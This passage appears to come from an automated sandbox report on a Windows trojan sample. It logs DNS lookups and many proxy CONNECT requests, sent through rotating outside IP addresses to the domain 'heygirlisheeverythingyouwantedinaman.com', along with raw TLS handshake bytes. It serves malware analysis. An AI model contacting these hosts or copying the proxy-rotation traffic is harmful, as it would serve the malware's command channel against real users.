                                                                                Feb 23, 2024 14:28:25.547471046 CET1.1.1.1192.168.2.80xfbd8No error (0)heygirlisheeverythingyouwantedinaman.com172.67.190.93A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:25.547471046 CET1.1.1.1192.168.2.80xfbd8No error (0)heygirlisheeverythingyouwantedinaman.com104.21.57.121A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:29.154045105 CET1.1.1.1192.168.2.80xbe0cNo error (0)repository.gij.edu.gh102.223.20.217A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:40.447200060 CET1.1.1.1192.168.2.80x2d91No error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:47.786770105 CET1.1.1.1192.168.2.80x7217No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:49.267534971 CET1.1.1.1192.168.2.80x7d7aNo error (0)mail.supplyvan.xyz199.188.206.65A (IP address)IN (0x0001)false

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849748104.45.128.122805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.003993034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.304085970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.616609097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.225970030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.429121971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.683496952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882740974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382556915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.195076942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.849767172.67.181.11805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.023421049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.111267090 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.84972494.40.127.16641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.048996925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.849772153.92.214.224805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.051369905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.397907972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.757210970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.475996971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.913480997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382802010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.882553101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882772923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.694996119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.849730196.20.125.12980835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.056237936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.84974382.135.123.15580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.079880953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.451420069 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.849764134.209.29.12031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.086977959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.247733116 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.849816104.16.105.146805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.143544912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.231139898 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.8497348.213.129.15505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.176455975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.481797934 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.849840104.27.122.6805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.176934004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.264399052 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.849849172.67.181.12805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.190431118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.277812958 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.849723115.96.208.12480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.193198919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.537437916 CET72INHTTP/1.1 200 Connection Established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.84981350.63.12.33346445828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.196054935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.616590023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.054104090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.913518906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.632340908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.492055893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382636070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991972923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.8498025.9.98.14230805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.204389095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.849895172.67.187.242805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.253715038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.341411114 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.84976347.74.152.2988885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.257006884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.849901188.114.99.37805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.258980989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.346565008 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.849886167.114.107.37805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.263967991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.417850018 CET70INHTTP/1.0 200 Connection Established
                                                                                Proxy-agent: Website Firewall
                                                                                Feb 23, 2024 14:28:22.418602943 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 9d 75 99 6a 5a 63 e6 04 60 77 10 84 c9 94 6c d5 a4 cc 1f 1e a3 6a 23 aa af f3 2e e2 15 dc 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: eujZc`wlj#.*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                Feb 23, 2024 14:28:22.540838003 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 76 cd de 12 9d f7 7c 27 0b 44 1a 14 2e 4a 18 32 fc e2 b2 e6 b8 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?ev|'D.J2DOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:22.540872097 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                Feb 23, 2024 14:28:22.540911913 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                Feb 23, 2024 14:28:22.540929079 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                Feb 23, 2024 14:28:22.545881033 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4b c5 b0 d3 fe 27 4d ef d4 01 67 c9 07 1c bb 0f 5a 6b 14 25 38 1e ca 40 0b 61 55 40 f8 12 11 3d 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 22 d7 9a 36 0c 5d 4a 45 4c d9 f1 a3 ec c6 88 0b fe 8c 8d e5 24
                                                                                Data Ascii: %! K'MgZk%8@aU@=("6]JEL$xA'M~%l
                                                                                Feb 23, 2024 14:28:22.670142889 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 8e 3a 3d 07 81 58 95 d8 00 c3 f7 a0 65 65 3b 59 7b 03 a6 e9 d9 db 3d ee 29 5a 03 64 d0 ff 72 f6 52 14 c2 ea 1c 75 6b 03 47 23 27 06 92 e6 e6 f7 f4 cd e0 3f 9b 36 c3 57 db 8e 44 b3 91 6e 09 3a e4 c1 2a
                                                                                Data Ascii: :=Xee;Y{=)ZdrRukG#'?6WDn:*R,YdUn]ai$T&p55/g(,4Jf}3t"JvPIz;Cljt,"c=sl["k?8>}q(*HbDJ#:
                                                                                Feb 23, 2024 14:28:22.672313929 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 60 a0 17 86 f0 9f 9b e3 b8 6c 43 76 70 fd 6c 77 8d ae 43 d5 f5 83 e3 61 08 b5 82 e0 96 bc 87 70 a9 6b f1 25 67 8f bb 83 31 86 f7 7a 57 a7 06 fb b7 5b e2 64 dd 1e 2b 47 1d a6 25 b8 e2 fb f3 2d 0d 47 6f 53 54
                                                                                Data Ascii: `lCvplwCapk%g1zW[d+G%-GoSTN<#7AJ^n[tb&[JF,ri+:nx
                                                                                Feb 23, 2024 14:28:23.029968023 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 c0 00 2d 92 ca cc 17 39 80 a0 a9 40 32 68 65 ee 6f 93 3f 3a 14 c4 3c 74 05 79 58 8b ff 0e e3 3e 4b 6d b3 f7 71 ce 49 fc 54 fc c7 69 1c 82 f5 e9 40 9c 8e 4f 27 a1 19 fc 12 71 b9 d0 b0 00 b0 1e cf 23 31 68 de
                                                                                Data Ascii: q-9@2heo?:<tyX>KmqITi@O'q#1hgL'u%Qc:8"@=ow=}jsoAa<p/ Xh%Zmk_{$f. -LUf-y-+Z{>"vAHs$(3)owco"cWGpTs
                                                                                Feb 23, 2024 14:28:23.030000925 CET1286INData Raw: c9 91 7d fa 2e 00 00 de 19 d3 d6 22 0f de e1 7a 04 c4 1a ba c3 ad 2c ec 61 53 d0 a2 66 cd e1 01 ce 9c a7 fd 8f 6a b8 2a c7 2c c0 86 59 ac 06 3b 11 06 f8 82 5e 4c d9 ec f5 44 59 86 46 6b af f4 d8 ea 9b 41 2b 07 a5 8c 95 d2 bf ac 42 bb 7a d4 52 9f
                                                                                Data Ascii: }."z,aSfj*,Y;^LDYFkA+BzRi<~>}.qRmo4i%WFuse}.~K<Q%/o >E_C>Dze\0EIrB\-\9N;^H\


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.849768178.128.82.105532995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.266588926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
